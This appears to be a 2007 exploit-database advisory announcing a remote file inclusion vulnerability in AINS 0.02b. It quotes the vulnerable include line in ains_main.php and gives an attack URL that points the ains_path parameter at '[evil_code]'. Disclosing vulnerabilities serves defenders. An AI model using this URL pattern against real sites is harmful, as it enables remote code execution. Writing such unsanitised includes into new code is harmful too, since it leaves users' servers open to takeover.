id: 1428
date: 01/26/2007
title: AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability
author: ThE dE@Th
cves: 

======================================================================
AINS 0.02b (ains_main.php ains_path) Remote File Include Vulnerability
======================================================================



AINS 0.02b - Remote File Include Vulnerabilities

Finded by ThE dE@Th

Greetings For :AsB-May Team & HaCk.eGy


ains_main.php:


include("$ains_path/ains_global.inc");


http://www.site.com/[path]/ains_main.php?ains_path=[evil_code]


#  0day.today [2023-03-26]  #